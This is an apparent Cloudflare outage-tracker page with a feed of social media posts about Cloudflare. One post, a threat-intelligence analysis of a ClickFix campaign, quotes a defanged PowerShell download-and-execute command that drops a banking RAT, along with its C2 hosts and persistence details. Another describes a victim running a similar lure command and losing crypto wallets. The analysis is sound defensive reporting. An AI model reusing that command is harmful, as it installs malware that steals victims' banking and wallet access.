Cloudflare status: hosting issues and outage reports
No problems detected
If you are having issues, please submit a report below.
Cloudflare is a company that provides DDoS mitigation, content delivery network (CDN) services, security and distributed DNS services. Cloudflare's services sit between the visitor and the Cloudflare user's hosting provider, acting as a reverse proxy for websites.
Problems in the last 24 hours
The graph below depicts the number of Cloudflare reports received over the last 24 hours by time of day. When the number of reports exceeds the baseline, represented by the red line, an outage is determined.
At the moment, we haven't detected any problems at Cloudflare. Are you experiencing issues or an outage? Leave a message in the comments section!
Most Reported Problems
The following are the most recent problems reported by Cloudflare users through our website.
- Domains (36%)
- Cloud Services (31%)
- Hosting (17%)
- Web Tools (11%)
- E-mail (6%)
Live Outage Map
The most recent Cloudflare outage reports came from the following cities:
| City | Problem Type | Report Time |
|---|---|---|
|
|
Domains | 2 days ago |
|
|
Cloud Services | 13 days ago |
|
|
Domains | 15 days ago |
|
|
Hosting | 28 days ago |
|
|
29 days ago | |
|
|
Web Tools | 29 days ago |
Community Discussion
Tips? Frustrations? Share them here. Useful comments include a description of the problem, city and postal code.
Beware of "support numbers" or "recovery" accounts that might be posted below. Make sure to report and downvote those comments. Avoid posting your personal information.
Cloudflare Issues Reports
Latest outage, problems and issue reports in social media:
-
Caleb Sylvest (@calebsylvest) reported@jasondoesstuff Skip the CMS. Recently did the same. Used Claude to build everything Used Astro. Deployed to Cloudflare. Writing with MDX. Pre-rendered everything and served from Cloudflare edge network. Basically a fast as possible.
-
Elizabeth (@Sounsmooth) reported@FBIPhiladelphia In Georgia they inputted Datalayers to cache and control. They then gather DNS and block the original government domain. They create a clone using Cloudflare London and Amazon. Then they wait 7 days. . . You know why. Then they activate it and viola a compromised Amazon fake government domain using a pre appointed L3 contractor who hired DEI employees are at the wheel with IT who ask the REF NAMED “Raj” Z and Kash’s buddy, who to blame for breaches is the GSA Zone 4 IC3. Kash Patel knows as do the IT volunteers. The China leak biz continues and RICO and bad guys thrive. AMERICANS LOSE. True story.
-
sunil pai (@threepointone) reportedis there interest in a 4k+ word deep dive in building reliable agent loops (on cloudflare and elsewhere) writing down what I've done for building agents resilient to catastrophic failures on clients/servers/inference (with zero user code) and I need to get it out of my brain
-
Dety (@Dety0) reportedServiceDesk tier list S: Cloudflare is down A: Password Reset, PC Crashing B: Data Backups C: Phishing Mails D: New User Onboarding, Meeting Room Setup F: Outlook Classic, PRINTERS
-
Rohit Kashyap | AI + Full-Stack (@rohit_jsfreaky) reported@EddCoates that nginx 500 is the scrapers basically ddosing you for free training data. robots txt is a polite suggestion they ignore now. what actually helps, put cloudflare in front with bot fight mode on, rate limit per asn not per ip since they rotate addresses, and consider a tarpit for the worst offenders. it is not legal so much as unenforceable at their scale, which is the real problem
-
special k | CEO of stressed out era (@specialkdelslay) reported@DispairSoftware @DataDeLaurier No no, I am showing the IPs of the ones hitting our site. They belong to openai (afaik). Cloudflare has helped with some of the bot activity but not all of it. I think they make the assumption that openai, claud, et al are good actors who will honor txt directives, when I can see for sure they are not. What he was telling me is to tunnel connections thru cloudflare and host privately but those things wouldn't mitigate this particular issue
-
Nes|🍉 (@perwian) reported@nateskeep Not surprising ,most Spanish clubs use ai a lot ,which is really hypocritical cause then they block **** *** cloudflare so people cannot pirate football
-
Pushkar Mishra (@Pushkarm029) reportedJust install Cloudflare WARP. No login. One click solution. No ads.
-
DFIR Radar (@DFIR_Radar) reportedAI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar
-
bigdatachads (@bigdatachads) reportedI've been building AI phone agents on @Cloudflare for a while now. v1. a Python container, fighting for every millisecond. v2. no container, the whole call on the edge. that was the real work. now that I have the stack down, I spent last weekend messing around. this is v3, a cartoon you talk to that remembers you and gets heckled by a second AI. all on Cloudflare primitives. three teardowns, first one tomorrow. follow along. @CloudflareDev
-
Calvin (@Calvin24seven) reported@EddCoates Honeypots, cloudflare, fingerprinting, not giving so much value away for free would help. Site is great btw
-
Jay (@jaypopat0) reported@FredKSchott Btw, would Flue support something like "Cloudflare Think"-style cloud agents as well? Curious if there are nice integrations with Cloudflare primitives (Workers, Durable Objects, Queues, etc.) for workflows and the overall agent harness.
-
Armeet (@armeetjatyani) reported@tomhaerter Primarily Cloudflare now. GCP support is extremely sluggish
-
Tom Talks Cars (@TomTalksCars) reported@EddCoates Cloudflare AI Crawl Control is pretty decent at cutting things down
-
SID | Degen (@SidDegen) reportedi don't buy the "ai search replaces Google" thesis. the data says the opposite is happening. Cloudflare Radar, may 2026: every ai chatbot — ChatGPT, Gemini, Claude, Perplexity — sends 0.29% of global search referrals. Google sends 87.63%. 301-to-1. Anthropic's ClaudeBot crawls 11,122 pages for every human visit it returns vs Google's 5:1. Alphabet Q1 2026 filing: Google search revenue $60.4B, +19% yoy, up from +17% in Q4. ai overviews hit 2.5B monthly users; ai mode crossed 1B. alphabet says ai overviews monetize at rates "similar to traditional search" (june 2026 investor presentation). the kill-google thesis is showing up as negative signal in the actual p&l. Perplexity — the consensus poster child — killed its entire ad business in feb (Financial Times, The Verge). ads generated $20K against $34M revenue. exec quote: "a user would just start doubting everything." a company that can't make advertising work cannot disrupt a $60B/quarter advertising business. the consensus pusher worth countering specifically — @sarahdingwang at a16z, who led Exa's $250M Series C at $2.2B in may. her line: "agents will search the web more than humans this year. soon orders of magnitudes more." historical analog — Netscape 1994-98. the next platform that would reduce windows to "a poorly debugged set of device drivers." 80% share, record ipo. microsoft bundled IE for free. netscape sold to AOL for scrap. the company that captured the value was the one everyone thought netscape would displace — Google, founded 1998 — the services layer above the commodity. counter-position: ai search isn't replacing Google. Google is becoming ai search. standalone players are fighting netscape's war while the incumbent absorbs the tech into a surface 2.5B people already use. investor read: Exa at $2.2B and Perplexity at $22B are priced for a market-share takeover the referral data says isn't happening. the smarter bet is the layer that monetizes the ai-overview expansion Google is driving.
-
Peter (@DivineTrading) reported@betangel Have successfully logged in at the 3rd attempt but was getting a Cloudflare issue (code 521)
-
Symedia (@Symedia_) reported@rickyrickyriri @SimonAlmers @AliGrids it's not a work email but a domain email look at tld-list buy a 1$ domain and get a cloudflare email. fixed the problem in few hours.
-
doeyor.sol (@Doeyor) reported@trunoest Last night I bought into algopub at 140k and the website linked had a cloudflare login I clicked and it asked me to enter something in my windows run which was to allow the attacker to install a remote Trojan they could use later. I realized at the time like something was wrong here but didn’t immediately know what was up and was constantly checking my balance to essentially see everything disappear 5-10 minutes go by and nothing start thinking I’m in the clear go on with my night end up going to bed left my computer on but not locked wake up to find 0 SOL balance and a bunch of tabs open on my pc. Thankfully didn’t have any eth on based bot and he opened up axiom and exported my private keys and sent just the 5 sol (3 wallets) I have to this (BBNpySDumyS3k4mULaunbMfyZz1Bpbt2B5PwVVWZVy3F) looks like he got a few other people as well. can even see my sns doeyor.sol Could have truly ruined my life with the access he had to my full computer. Just a reminder to be ever vigilant; went ahead and wiped the 3 hard drives that were connected to my computer with kill disk and reinstalled a fresh windows this morning.
-
Richard Sever (@cshperspectives) reported@manuelrivascruz working on solutions to this. the problem as I'm sure you can imagine is like so many sites we are being hammered by LLM bots in addition to all the DDOS attacks, so (again like many others) use services like Cloudflare to ensure human readers maintain access
-
tidux (@skibidiblazor) reported@prestonjbyrne Not to mention because the major cloud providers have their own international cables between datacenters they'd have to put that DPI filter in front of Cloudflare, Cloudfront, Azure and Google CDNs, YouTube, etc.... it would make the Internet unusably slow.
-
Arda (@onurardaoz) reported@Cloudflare Warp ui sucks for macs now. Please turn it back.
-
simulx4 (@simulx4) reportedcloudflare is using Kimi K2.6 to automatically resolve billing issues. and... it worked fine. it fixed my problem faster than any human. by chat/email... so much better than talking to a person, honestly
-
Kolar😎 (@Kolar_Dev) reportedAs a product builder, avoid putting your entire infrastructure under a single provider. If your database is running on an EC2 instance, keep backups somewhere independent, such as Cloudflare R2. The goal isn't just redundancy, it's leverage. No single provider should be able to take your product offline, lock you out, or put your business at risk with a single outage or account issue.
-
Court Reinland (@Court_Reinland) reported@EddCoates Cloudflare can help with this, they can tune out a lot of this.
-
Pieces by Julian Undav (@piecebyjulian) reportedI also understand that some of the words on pallets changed. PLEASE NOTE THAT the words were minted onchain, so your words are safe! We shifted the hosting site to Cloudflare after so many api calls (why the site was down for a couple of days) Please bear with us. working hard right now
-
Elshad (@elshad_ff) reported@Teknium Anyone using dashboard via Cloudflare tunnel? Have you websocket problem?
-
Brandon Bedford (@wealthpotion) reported"Claude is down" is the new "Cloudflare is down" except way worse.
-
kiosa (@thegreatest_sv) reportedTHE BIGGEST SCAM IN TECH MIGHT BE HOW MUCH PEOPLE STILL PAY TO HOST SIMPLE WEBSITES. >I just launched one for $0. > have 9 project ideas > each needs a domain (~$15) + hosting (~$10/mo) + SSL > do the math > talk yourself out of 7 of them > later find out domains can be free > register one in 2 minutes, no card > Cloudflare for DNS + SSL, free > Cloudflare Pages for hosting, free > live custom-domain site in 20 minutes > cost: $0 > mfw the only thing stopping me was a bill I never had to pay >full build below
-
Kastan Day (@KastanDay) reportedextremely bullish signal for open models, like on @Cloudflare Workers AI
-
Fardeem (@FardeemM) reportedIf you're on your way to building a billion dollar company that involves a web app, here are some of my notes on architecting the frontend. if you don't do this, it's probably fine but one day you'll hire someone to fix it but truly that person could be doing some other higher value thing if you make some key optimizations on day 1 you don't even have to learn anything you're gonna tell your agents to do it anyways! okay here it goes: - Make your server code generate a openapi spec which then generates all the relevant client side code. Never do this by hand. Typing backend types instead of generating them should be banned - You need to make a decision on how the client talks to the backend. rest/graphql works in which case please just use tanstack query. other libraries will look similar but tanstack query truly is goated. - if you want linear style sync setups or offline mode, think about this HARD and architect it from day 1. Bolting this on later is so tedious. - People like using plain react router but things have gotten a lot better since then. Try their new framework mode or just even use tanstack router. Use route data loaders. - If you store a lot of state in query params, make that a first class citizen and make sure its type safe. use nuqs or tanstack query. - Most apps just need a single state management situation for server state and thats it. If you have other bespoke needs, i have quite like zustand and xstate/store. - If you have a super interactive app where things come in and out of view, theres a lot of frontend state to maintain, music is playing and what not, lock in and learn xstate. Trust me if you wanna keep ur sanity, you need to model ur frontend as a state machine otherwise you're gonna be deep in useEffect hell - React compiler is here my friends, the days of useMemo and useCallback are gone. Update your priors accordingly - Tailwind is easy and fun but makes it really hard to maintain a large app with consistent styling. You need a "agent-first design system/component library" but maybe this is a rant for another day - Don't be afraid to hack your routing library to fit your needs more closely. A lot of apps have "drawers" to show additional info. You should 100% be able to say "here's a route, make it a drawer" and everything should be handled from there. - Managing loading and error states using isPending and isError is madness. Lean into Suspense and ErrorBoundary. - Figuring out a blessed path for websockets and SSE on day 1 i think will pay dividends in the long term if you're building anything AI related. - If you're building a SPA, don't use next.js. it literally makes no sense. Why would you do this. - Definitely deploy on Cloudflare or vercel. There are other services but trust, there have weird missing features. - Assuming you build something people want, the next job is to build the factory so it can efficiently build the thing. Act accordingly.